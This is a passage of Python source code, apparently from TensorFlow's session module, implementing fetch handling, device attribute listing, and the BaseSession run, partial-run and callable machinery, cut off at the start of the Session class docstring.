class _AttrsFetchMapper(_FetchMapper):
"""Fetch mapper for attrs decorated classes."""
def __init__(self, fetches):
"""Creates a _AttrsFetchMapper.
Args:
fetches: An instance of an attrs decorated class.
"""
values = _get_attrs_values(fetches)
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in values]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
return self._fetch_type(*results)
class _FetchHandler(object):
"""Handler for structured fetches.
Given a graph, a user-provided structure for fetches, and a feed dict, this
class takes care of generating a list of tensor names to fetch and op names
to run for a low level `run()` call.
Given the results of the low level run call, this class can also rebuild a
result structure matching the user-provided structure for fetches, but
containing the corresponding results.
"""
# TODO(touts): Make this class also take care of destructuring the feed
# dict instead of doing it in the callers.
def __init__(self, graph, fetches, feeds, feed_handles=None):
"""Creates a fetch handler.
Args:
graph: Graph of the fetches. Used to check for fetchability and to
convert all fetches to tensors or ops as needed.
fetches: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
feeds: A feed dict where keys are Tensors.
feed_handles: A dict from feed Tensors to TensorHandle objects used as
direct feeds.
"""
with graph.as_default():
self._fetch_mapper = _FetchMapper.for_fetch(fetches)
self._fetches = []
self._targets = []
self._feeds = feeds
self._feed_handles = (
feed_handles or object_identity.ObjectIdentityDictionary())
self._ops = []
self._fetch_handles = object_identity.ObjectIdentityDictionary()
for fetch in self._fetch_mapper.unique_fetches():
if isinstance(fetch, ops.Operation):
self._assert_fetchable(graph, fetch)
self._targets.append(fetch)
self._ops.append(True)
else:
self._assert_fetchable(graph, fetch.op)
self._fetches.append(fetch)
self._ops.append(False)
# Remember the fetch if it is for a tensor handle.
if (isinstance(fetch, ops.Tensor) and
(fetch.op.type == 'GetSessionHandle' or
fetch.op.type == 'GetSessionHandleV2')):
self._fetch_handles[fetch] = fetch.op.inputs[0].dtype
self._final_fetches = [x for x in self._fetches if x not in feeds]
def _assert_fetchable(self, graph, op):
if not graph.is_fetchable(op):
raise errors.InaccessibleTensorError(
'Operation %r has been marked as not fetchable. Typically this'
' happens when it is defined in another function or code block.'
' Use return values,explicit Python locals or TensorFlow collections'
' to access it.'
% op.name)
def fetches(self):
"""Return the unique names of tensors to fetch.
Returns:
A list of strings.
"""
return self._final_fetches
def targets(self):
"""Return the unique names of ops to run.
Returns:
A list of strings.
"""
return self._targets
def build_results(self, session, tensor_values):
"""Build results matching the original fetch shape.
`tensor_values` must be a list of the same length as
the one returned by `fetches()`, and holding the requested
fetch values.
This method builds a struct with the same shape as the original `fetches`
passed to the constructor, in which the fetches are replaced by their
fetched value.
Args:
session: The enclosing session. Used for tensor handles.
tensor_values: List of values matching the list returned by fetches().
Returns:
A structure of the same shape as the original `fetches` argument but
containing tensors or None (for fetched ops).
"""
full_values = []
assert len(self._final_fetches) == len(tensor_values)
i = 0
j = 0
for is_op in self._ops:
if is_op:
full_values.append(None)
else:
# If the fetch was in the feeds, use the fed value, otherwise
# use the returned value.
if self._fetches[i] in self._feed_handles:
# A fetch had a corresponding direct TensorHandle feed. Call eval()
# to obtain the Tensor value from the TensorHandle.
value = self._feed_handles[self._fetches[i]].eval()
else:
value = self._feeds.get(self._fetches[i])
if value is None:
value = tensor_values[j]
j += 1
dtype = self._fetch_handles.get(self._fetches[i])
if dtype:
full_values.append(session_ops.TensorHandle(value, dtype, session))
else:
full_values.append(value)
i += 1
assert j == len(tensor_values)
return self._fetch_mapper.build_results(full_values)
def _name_list(tensor_list):
"""Utility function for transitioning to the new session API.
Args:
tensor_list: a list of `Tensor`s.
Returns:
A list of each `Tensor`s name (as byte arrays).
"""
return [compat.as_bytes(t.name) for t in tensor_list]
class _DeviceAttributes(object):
"""Struct-like object describing a device's attributes.
Each device has 3 key properties:
- name: the fully-qualified TensorFlow path to the device. For
example: /job:worker/replica:0/task:3/device:CPU:0
- device_type: the type of the device (e.g. CPU, GPU, TPU, etc.)
- memory_limit_bytes: the maximum amount of memory available on the device
(in bytes).
"""
def __init__(self, name, device_type, memory_limit_bytes, incarnation):
self._name = device.canonical_name(name)
self._device_type = device_type
self._memory_limit_bytes = memory_limit_bytes
self._incarnation = incarnation
@property
def name(self):
return self._name
@property
def device_type(self):
return self._device_type
@property
def memory_limit_bytes(self):
return self._memory_limit_bytes
@property
def incarnation(self):
return self._incarnation
def __repr__(self):
return '_DeviceAttributes(%s, %s, %d, %d)' % (
self.name,
self.device_type,
self.memory_limit_bytes,
self.incarnation,
)
class BaseSession(SessionInterface):
"""A class for interacting with a TensorFlow computation.
The BaseSession enables incremental graph building with inline
execution of Operations and evaluation of Tensors.
"""
def __init__(self, target='', graph=None, config=None):
"""Constructs a new TensorFlow session.
Args:
target: (Optional) The TensorFlow execution engine to connect to.
graph: (Optional) The graph to be used. If this argument is None, the
default graph will be used.
config: (Optional) ConfigProto proto used to configure the session. If no
config is specified, the global default will be used. The global default
can be configured via the tf.config APIs.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
creating the TensorFlow session.
TypeError: If one of the arguments has the wrong type.
"""
_python_session_create_counter.get_cell().increase_by(1)
if graph is None:
self._graph = ops.get_default_graph()
else:
if not isinstance(graph, ops.Graph):
raise TypeError('graph must be a tf.Graph, but got %s' % type(graph))
self._graph = graph
self._closed = False
if target is not None:
try:
self._target = compat.as_bytes(target)
except TypeError:
if isinstance(target, config_pb2.ConfigProto):
raise TypeError('target must be a string, but got %s.'
' Did you do "Session(config)" instead of'
' "Session(config=config)"?' % type(target))
raise TypeError('target must be a string, but got %s' % type(target))
else:
self._target = None
self._delete_lock = threading.Lock()
self._dead_handles = []
if config is None:
config = context.context().config
if not isinstance(config, config_pb2.ConfigProto):
raise TypeError('config must be a tf.ConfigProto, but got %s' %
type(config))
if (mixed_precision_global_state.mixed_precision_graph_rewrite_is_enabled
and config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.OFF):
new_config = config_pb2.ConfigProto()
new_config.CopyFrom(config)
new_config.graph_options.rewrite_options.auto_mixed_precision = (
rewriter_config_pb2.RewriterConfig.ON)
config = new_config
elif (config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.ON):
mixed_precision_global_state.non_mixed_precision_session_created = True
self._config = config
self._add_shapes = config.graph_options.infer_shapes
self._session = None
opts = tf_session.TF_NewSessionOptions(target=self._target, config=config)
try:
# pylint: disable=protected-access
self._session = tf_session.TF_NewSessionRef(self._graph._c_graph, opts)
# pylint: enable=protected-access
finally:
tf_session.TF_DeleteSessionOptions(opts)
def list_devices(self):
"""Lists available devices in this session.
```python
devices = sess.list_devices()
for d in devices:
print(d.name)
```
Where:
Each element in the list has the following properties
name: A string with the full name of the device. ex:
`/job:worker/replica:0/task:3/device:CPU:0`
device_type: The type of the device (e.g. `CPU`, `GPU`, `TPU`.)
memory_limit: The maximum amount of memory available on the device.
Note: depending on the device, it is possible the usable memory could
be substantially less.
Raises:
tf.errors.OpError: If it encounters an error (e.g. session is in an
invalid state, or network errors occur).
Returns:
A list of devices in the session.
"""
raw_device_list = tf_session.TF_SessionListDevices(self._session)
device_list = []
size = tf_session.TF_DeviceListCount(raw_device_list)
for i in range(size):
name = tf_session.TF_DeviceListName(raw_device_list, i)
device_type = tf_session.TF_DeviceListType(raw_device_list, i)
memory = tf_session.TF_DeviceListMemoryBytes(raw_device_list, i)
incarnation = tf_session.TF_DeviceListIncarnation(raw_device_list, i)
device_list.append(
_DeviceAttributes(name, device_type, memory, incarnation))
tf_session.TF_DeleteDeviceList(raw_device_list)
return device_list
def close(self):
"""Closes this session.
Calling this method frees all resources associated with the session.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
closing the TensorFlow session.
"""
if self._session and not self._closed:
self._closed = True
tf_session.TF_CloseSession(self._session)
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
if self._session is not None:
try:
tf_session.TF_DeleteSession(self._session)
except (AttributeError, TypeError):
# At shutdown, `c_api_util`, `tf_session`, or
# `tf_session.TF_DeleteSession` may have been garbage collected, causing
# the above method calls to fail. In this case, silently leak since the
# program is about to terminate anyway.
pass
self._session = None
@property
def graph(self):
"""The graph that was launched in this session."""
return self._graph
@property
def graph_def(self):
"""A serializable version of the underlying TensorFlow graph.
Returns:
A graph_pb2.GraphDef proto containing nodes for all of the Operations in
the underlying TensorFlow graph.
"""
return self._graph.as_graph_def(add_shapes=self._add_shapes)
@property
def sess_str(self):
return self._target
def as_default(self):
"""Returns a context manager that makes this object the default session.
Use with the `with` keyword to specify that calls to
`tf.Operation.run` or `tf.Tensor.eval` should be executed in
this session.
```python
c = tf.constant(..)
sess = tf.compat.v1.Session()
with sess.as_default():
assert tf.compat.v1.get_default_session() is sess
print(c.eval())
```
To get the current default session, use `tf.compat.v1.get_default_session`.
*N.B.* The `as_default` context manager *does not* close the
session when you exit the context, and you must close the session
explicitly.
```python
c = tf.constant(...)
sess = tf.compat.v1.Session()
with sess.as_default():
print(c.eval())
# ...
with sess.as_default():
print(c.eval())
sess.close()
```
Alternatively, you can use `with tf.compat.v1.Session():` to create a
session that is automatically closed on exiting the context,
including when an uncaught exception is raised.
*N.B.* The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
*N.B.* Entering a `with sess.as_default():` block does not affect
the current default graph. If you are using multiple graphs, and
`sess.graph` is different from the value of
`tf.compat.v1.get_default_graph`, you must explicitly enter a
`with sess.graph.as_default():` block to make `sess.graph` the default
graph.
Returns:
A context manager using this session as the default session.
"""
return ops.default_session(self)
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations and evaluates tensors in `fetches`.
This method runs one "step" of TensorFlow computation, by
running the necessary graph fragment to execute every `Operation`
and evaluate every `Tensor` in `fetches`, substituting the values in
`feed_dict` for the corresponding input values.
The `fetches` argument may be a single graph element, or an arbitrarily
nested list, tuple, namedtuple, dict, or OrderedDict containing graph
elements at its leaves. A graph element can be one of the following types:
* A `tf.Operation`.
The corresponding fetched value will be `None`.
* A `tf.Tensor`.
The corresponding fetched value will be a numpy ndarray containing the
value of that tensor.
* A `tf.SparseTensor`.
The corresponding fetched value will be a
`tf.compat.v1.SparseTensorValue`
containing the value of that sparse tensor.
* A `get_tensor_handle` op. The corresponding fetched value will be a
numpy ndarray containing the handle of that tensor.
* A `string` which is the name of a tensor or operation in the graph.
The value returned by `run()` has the same shape as the `fetches` argument,
where the leaves are replaced by the corresponding values returned by
TensorFlow.
Example:
```python
a = tf.constant([10, 20])
b = tf.constant([1.0, 2.0])
# 'fetches' can be a singleton
v = session.run(a)
# v is the numpy array [10, 20]
# 'fetches' can be a list.
v = session.run([a, b])
# v is a Python list with 2 numpy arrays: the 1-D array [10, 20] and the
# 1-D array [1.0, 2.0]
# 'fetches' can be arbitrary lists, tuples, namedtuple, dicts:
MyData = collections.namedtuple('MyData', ['a', 'b'])
v = session.run({'k1': MyData(a, b), 'k2': [b, a]})
# v is a dict with
# v['k1'] is a MyData namedtuple with 'a' (the numpy array [10, 20]) and
# 'b' (the numpy array [1.0, 2.0])
# v['k2'] is a list with the numpy array [1.0, 2.0] and the numpy array
# [10, 20].
```
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. Each key in `feed_dict` can be
one of the following types:
* If the key is a `tf.Tensor`, the
value may be a Python scalar, string, list, or numpy ndarray
that can be converted to the same `dtype` as that
tensor. Additionally, if the key is a
`tf.compat.v1.placeholder`, the shape of
the value will be checked for compatibility with the placeholder.
* If the key is a
`tf.SparseTensor`,
the value should be a
`tf.compat.v1.SparseTensorValue`.
* If the key is a nested tuple of `Tensor`s or `SparseTensor`s, the value
should be a nested tuple with the same structure that maps to their
corresponding values as above.
Each value in `feed_dict` must be convertible to a numpy array of the dtype
of the corresponding key.
The optional `options` argument expects a [`RunOptions`] proto. The options
allow controlling the behavior of this particular step (e.g. turning tracing
on).
The optional `run_metadata` argument expects a [`RunMetadata`] proto. When
appropriate, the non-Tensor output of this step will be collected there. For
example, when users turn on tracing in `options`, the profiled info will be
collected into this argument and passed back.
Args:
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (described
above).
feed_dict: A dictionary that maps graph elements to values (described
above).
options: A [`RunOptions`] protocol buffer
run_metadata: A [`RunMetadata`] protocol buffer
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary (described above).
Order in which `fetches` operations are evaluated inside the call
is undefined.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
ValueError: If `fetches` or `feed_dict` keys are invalid or refer to a
`Tensor` that doesn't exist.
"""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
result = self._run(None, fetches, feed_dict, options_ptr,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return result
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with more feeds and fetches.
This is EXPERIMENTAL and subject to change.
To use partial execution, a user first calls `partial_run_setup()` and
then a sequence of `partial_run()`. `partial_run_setup` specifies the
list of feeds and fetches that will be used in the subsequent
`partial_run` calls.
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. See run() for more information.
Below is a simple example:
```python
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.multiply(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
res = sess.partial_run(h, r2, feed_dict={c: res})
```
Args:
handle: A handle for a sequence of partial runs.
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (see
documentation for `run`).
feed_dict: A dictionary that maps graph elements to values (described
above).
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary
(see documentation for `run`).
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# TODO(touts): Support feeding and fetching the same tensor.
return self._run(handle, fetches, feed_dict, None, None)
def partial_run_setup(self, fetches, feeds=None):
"""Sets up a graph with feeds and fetches for partial run.
This is EXPERIMENTAL and subject to change.
Note that contrary to `run`, `feeds` only specifies the graph elements.
The tensors will be supplied by the subsequent `partial_run` calls.
Args:
fetches: A single graph element, or a list of graph elements.
feeds: A single graph element, or a list of graph elements.
Returns:
A handle for partial run.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
tf.errors.OpError: Or one of its subclasses if a TensorFlow error happens.
"""
def _feed_fn(feed):
for tensor_type, _, _, feed_fn in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
if feeds is None:
feeds = []
# Create request.
feed_list = []
# Validate and process feed_list.
is_list_feed = isinstance(feeds, (list, tuple))
if not is_list_feed:
feeds = [feeds]
for feed in feeds:
for subfeed in _feed_fn(feed):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
# pylint: disable=protected-access
feed_list.append(subfeed_t._as_tf_output())
# pylint: enable=protected-access
except Exception as e:
e.message = ('Cannot interpret feed_list key as Tensor: ' + e.message)
e.args = (e.message,)
raise e
# Validate and process fetches.
# TODO(touts): Support feeding and fetching the same tensor.
fetch_handler = _FetchHandler(self._graph, fetches,
object_identity.ObjectIdentityDictionary())
# Set up a graph with feeds and fetches for partial run.
def _setup_fn(session, feed_list, fetch_list, target_list):
self._extend_graph()
return tf_session.TF_SessionPRunSetup_wrapper(session, feed_list,
fetch_list, target_list)
# pylint: disable=protected-access
final_fetches = [t._as_tf_output() for t in fetch_handler.fetches()]
final_targets = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
return self._do_call(_setup_fn, self._session, feed_list, final_fetches,
final_targets)
def _run(self, handle, fetches, feed_dict, options, run_metadata):
"""Perform either run or partial_run, depending the presence of `handle`."""
def _feed_fn(feed, feed_val):
for tensor_type, _, feed_fn, _ in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed, feed_val)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
# Create request.
feed_dict_tensor = object_identity.ObjectIdentityDictionary()
feed_map = {}
# Validate and process feed_dict.
feed_handles = {}
if feed_dict:
feed_dict = nest.flatten_dict_items(feed_dict)
for feed, feed_val in feed_dict.items():
for subfeed, subfeed_val in _feed_fn(feed, feed_val):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
except Exception as e:
raise TypeError('Cannot interpret feed_dict key as Tensor: ' +
e.args[0])
if isinstance(subfeed_val, ops.Tensor):
raise TypeError('The value of a feed cannot be a tf.Tensor object. '
'Acceptable feed values include Python scalars, '
'strings, lists, numpy ndarrays, or TensorHandles. '
'For reference, the tensor object was ' +
str(feed_val) + ' which was passed to the '
'feed with key ' + str(feed) + '.')
subfeed_dtype = subfeed_t.dtype.as_numpy_dtype
if isinstance(subfeed_val, int) and _convert_to_numpy_obj(
subfeed_dtype, subfeed_val) != subfeed_val:
raise TypeError(
'Type of feed value ' + str(subfeed_val) + ' with type ' +
str(type(subfeed_val)) +
' is not compatible with Tensor type ' + str(subfeed_dtype) +
'. Try explicitly setting the type of the feed tensor'
' to a larger type (e.g. int64).')
is_tensor_handle_feed = isinstance(subfeed_val,
session_ops.TensorHandle)
if is_tensor_handle_feed:
np_val = subfeed_val.to_numpy_array()
feed_handles[subfeed_t] = subfeed_val
else:
np_val = np.asarray(subfeed_val, dtype=subfeed_dtype)
if (not is_tensor_handle_feed and
not subfeed_t.get_shape().is_compatible_with(np_val.shape)):
raise ValueError(
'Cannot feed value of shape %r for Tensor %r, '
'which has shape %r' %
(np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
if not self.graph.is_feedable(subfeed_t):
raise ValueError('Tensor %s may not be fed.' % subfeed_t)
feed_dict_tensor[subfeed_t] = np_val
feed_map[compat.as_bytes(subfeed_t.name)] = (subfeed_t, subfeed_val)
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(
self._graph, fetches, feed_dict_tensor, feed_handles=feed_handles)
# Run request and get response.
# We need to keep the returned movers alive for the following _do_run().
# These movers are no longer needed when _do_run() completes, and
# are deleted when `movers` goes out of scope when this _run() ends.
# TODO(yuanbyu, keveman): Revisit whether we should just treat feeding
# of a handle from a different device as an error.
_ = self._update_with_movers(feed_dict_tensor, feed_map)
final_fetches = fetch_handler.fetches()
final_targets = fetch_handler.targets()
# We only want to really perform the run if fetches or targets are provided,
# or if the call is a partial run that specifies feeds.
if final_fetches or final_targets or (handle and feed_dict_tensor):
results = self._do_run(handle, final_targets, final_fetches,
feed_dict_tensor, options, run_metadata)
else:
results = []
return fetch_handler.build_results(self, results)
def make_callable(self, fetches, feed_list=None, accept_options=False):
"""Returns a Python callable that runs a particular step.
The returned callable will take `len(feed_list)` arguments whose types
must be compatible feed values for the respective elements of `feed_list`.
For example, if element `i` of `feed_list` is a `tf.Tensor`, the `i`th
argument to the returned callable must be a numpy ndarray (or something
convertible to an ndarray) with matching element type and shape. See
`tf.Session.run` for details of the allowable feed key and value types.
The returned callable will have the same return type as
`tf.Session.run(fetches, ...)`. For example, if `fetches` is a `tf.Tensor`,
the callable will return a numpy ndarray; if `fetches` is a `tf.Operation`,
it will return `None`.
Args:
fetches: A value or list of values to fetch. See `tf.Session.run` for
details of the allowable fetch types.
feed_list: (Optional.) A list of `feed_dict` keys. See `tf.Session.run`
for details of the allowable feed key types.
accept_options: (Optional.) If `True`, the returned `Callable` will be
able to accept `tf.compat.v1.RunOptions` and `tf.compat.v1.RunMetadata`
as optional keyword arguments `options` and `run_metadata`,
respectively, with the same syntax and semantics as `tf.Session.run`,
which is useful for certain use cases (profiling and debugging) but will
result in measurable slowdown of the `Callable`'s
performance. Default: `False`.
Returns:
A function that when called will execute the step defined by
`feed_list` and `fetches` in this session.
Raises:
TypeError: If `fetches` or `feed_list` cannot be interpreted
as arguments to `tf.Session.run`.
"""
if feed_list is not None:
if not isinstance(feed_list, (list, tuple)):
raise TypeError('`feed_list` must be a list or tuple.')
# Delegate any non-empty feed lists to the existing `run()` logic.
# TODO(mrry): Refactor the feed handling logic from
# `Session._run()` so that we can convert the feeds to a list of
# strings here.
def _generic_run(*feed_args, **kwargs):
feed_dict = {
feed: feed_val for feed, feed_val in zip(feed_list, feed_args)
}
return self.run(fetches, feed_dict=feed_dict, **kwargs)
return _generic_run
# Ensure any changes to the graph are reflected in the runtime.
# Note that we don't need to do this on subsequent calls to the
# returned object, because the arguments to `fetches` must already be
# in the graph.
self._extend_graph()
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(self._graph, fetches,
object_identity.ObjectIdentityDictionary())
# pylint: disable=protected-access
fetch_list = [t._as_tf_output() for t in fetch_handler.fetches()]
target_list = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
def _callable_template_with_options_and_metadata(fetch_list,
target_list,
fetch_handler,
options=None,
run_metadata=None):
"""Template callable that accepts RunOptions and RunMetadata."""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
results = self._call_tf_sessionrun(options_ptr, {}, fetch_list,
target_list, run_metadata_ptr)
if fetch_handler:
results = fetch_handler.build_results(self, results)
else:
results = results[0] if results else None
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return results
if accept_options:
return functools.partial(_callable_template_with_options_and_metadata,
fetch_list, target_list, fetch_handler)
elif isinstance(fetches, ops.Operation):
# Special case for fetching a single operation, because the
# function will have no return value.
assert not fetch_list
assert len(target_list) == 1
def _single_operation_run():
self._call_tf_sessionrun(None, {}, [], target_list, None)
return _single_operation_run
elif isinstance(fetches, ops.Tensor):
# Special case for fetching a single tensor, because the
# function can return the result of `TF_Run()` directly.
assert len(fetch_list) == 1
assert not target_list
def _single_tensor_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, [], None)
return results[0]
return _single_tensor_run
else:
# In all other cases, we must use `fetch_handler` to build the
# results for us.
def _fetch_handler_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, target_list,
None)
return fetch_handler.build_results(self, results)
return _fetch_handler_run
# Captures the name of a node in an error status. The regex below matches
# both the old and the new formats:
# Old format: [[Node: <node_name> = ...]]
# New format: [[{{node <node_name>}} = ...]]
_NODEDEF_NAME_RE = re.compile(
r'\[\[(Node: )?(\{\{node )?([^\} ]*)(\}\})?\s*=*')
def _do_run(self, handle, target_list, fetch_list, feed_dict, options,
run_metadata):
"""Runs a step based on the given fetches and feeds.
Args:
handle: a handle for partial_run. None if this is just a call to run().
target_list: A list of operations to be run, but not fetched.
fetch_list: A list of tensors to be fetched.
feed_dict: A dictionary that maps tensors to numpy ndarrays.
options: A (pointer to a) [`RunOptions`] protocol buffer, or None
run_metadata: A (pointer to a) [`RunMetadata`] protocol buffer, or None
Returns:
A list of numpy ndarrays, corresponding to the elements of
`fetch_list`. If the ith element of `fetch_list` contains the
name of an operation, the first Tensor output of that operation
will be returned for that element.
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# pylint: disable=protected-access
feeds = dict((t._as_tf_output(), v) for t, v in feed_dict.items())
fetches = [t._as_tf_output() for t in fetch_list]
targets = [op._c_op for op in target_list]
# pylint: enable=protected-access
def _run_fn(feed_dict, fetch_list, target_list, options, run_metadata):
# Ensure any changes to the graph are reflected in the runtime.
self._extend_graph()
return self._call_tf_sessionrun(options, feed_dict, fetch_list,
target_list, run_metadata)
def _prun_fn(handle, feed_dict, fetch_list):
if target_list:
raise RuntimeError('partial_run() requires empty target_list.')
return self._call_tf_sessionprun(handle, feed_dict, fetch_list)
if handle is None:
return self._do_call(_run_fn, feeds, fetches, targets, options,
run_metadata)
else:
return self._do_call(_prun_fn, handle, feeds, fetches)
def _do_call(self, fn, *args):
try:
return fn(*args)
except errors.OpError as e:
message = compat.as_text(e.message)
m = BaseSession._NODEDEF_NAME_RE.search(message)
node_def = None
op = None
if m is not None:
node_name = m.group(3)
try:
op = self._graph.get_operation_by_name(node_name)
node_def = op.node_def
except KeyError:
pass
message = error_interpolation.interpolate(message, self._graph)
if 'only supports NHWC tensor format' in message:
message += ('\nA possible workaround: Try disabling Grappler optimizer'
'\nby modifying the config for creating the session eg.'
'\nsession_config.graph_options.rewrite_options.'
'disable_meta_optimizer = True')
raise type(e)(node_def, op, message)
def _extend_graph(self):
with self._graph._session_run_lock(): # pylint: disable=protected-access
tf_session.ExtendSession(self._session)
# The threshold to run garbage collection to delete dead tensors.
_DEAD_HANDLES_THRESHOLD = 10
def _register_dead_handle(self, handle):
# Register a dead handle in the session. Delete the dead tensors when
# the number of dead tensors exceeds certain threshold.
tensors_to_delete = None
with self._delete_lock:
self._dead_handles.append(handle)
if len(self._dead_handles) == BaseSession._DEAD_HANDLES_THRESHOLD:
tensors_to_delete = self._dead_handles
self._dead_handles = []
# Delete the dead tensors.
if tensors_to_delete:
feeds = {}
fetches = []
for deleter_key, tensor_handle in enumerate(tensors_to_delete):
holder, deleter = session_ops._get_handle_deleter(
self.graph, deleter_key, tensor_handle)
feeds[holder] = tensor_handle
fetches.append(deleter)
self.run(fetches, feed_dict=feeds)
def _update_with_movers(self, feed_dict, feed_map):
# If a tensor handle that is fed to a device incompatible placeholder,
# we move the tensor to the right device, generate a new tensor handle,
# and update `feed_dict` to use the new handle.
handle_movers = []
for feed_name, val in feed_map.items():
mover = session_ops._get_handle_mover(self.graph, *val)
if mover:
handle_movers.append((feed_name, val[1], mover))
# Transfer a tensor to the right device if needed.
if not handle_movers:
return []
else:
feeds = {}
fetches = []
for _, handle, mover in handle_movers:
feeds[mover[0]] = handle
fetches.append(mover[1])
handles = self.run(fetches, feed_dict=feeds)
for handle_mover, handle in zip(handle_movers, handles):
np_val = np.array(handle.handle, dtype=np.object)
feed_name = handle_mover[0]
feed_tensor = feed_map[feed_name][0]
feed_dict[feed_tensor] = np_val
return handles
def _call_tf_sessionrun(self, options, feed_dict, fetch_list, target_list,
run_metadata):
return tf_session.TF_SessionRun_wrapper(self._session, options, feed_dict,
fetch_list, target_list,
run_metadata)
def _call_tf_sessionprun(self, handle, feed_dict, fetch_list):
return tf_session.TF_SessionPRun_wrapper(self._session, handle, feed_dict,
fetch_list)
# pylint: disable=protected-access
class _Callable(object):
"""Experimental wrapper for the C++ `Session::MakeCallable()` API."""
def __init__(self, session, callable_options):
self._session = session
self._handle = None
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(callable_options.SerializeToString()))
try:
self._handle = tf_session.TF_SessionMakeCallable(
session._session, options_ptr)
finally:
tf_session.TF_DeleteBuffer(options_ptr)
def __call__(self, *args, **kwargs):
# TODO(b/74355905): Support argument and return value nested structures,
# and tensor-like objects such as SparseTensors.
run_metadata = kwargs.get('run_metadata', None)
try:
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
ret = tf_session.TF_SessionRunCallable(self._session._session,
self._handle, args,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
return ret
def __del__(self):
# NOTE(mrry): It is possible that `self._session.__del__()` could be
# called before this destructor, in which case `self._session._session`
# will be `None`.
if (self._handle is not None and self._session._session is not None and
not self._session._closed):
tf_session.TF_SessionReleaseCallable(self._session._session,
self._handle)
# pylint: enable=protected-access
# TODO(b/74355905): Reimplement `Session.make_callable()` using this method
# where possible.
def _make_callable_from_options(self, callable_options):
"""Returns a handle to a "callable" with the given options.
Args:
callable_options: A `CallableOptions` protocol buffer message describing
the computation that will be performed by the callable.
Returns:
A handle to the new callable.
"""
self._extend_graph()
return BaseSession._Callable(self, callable_options)
@tf_export(v1=['Session'])
class Session(BaseSession):
"""A class for running TensorFlow operations.
A `Session` object encapsulates the environment in which `Operation`
objects are executed, and `Tensor` objects are evaluated. For
example:
```python
# Build a graph.
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# Launch the graph in a session.
sess = tf.compat.v1.Session()
# Evaluate the tensor `c`.
print(sess.run(c))
```
A session may own resources, such as
`tf.Variable`, `tf.queue.QueueBase`,
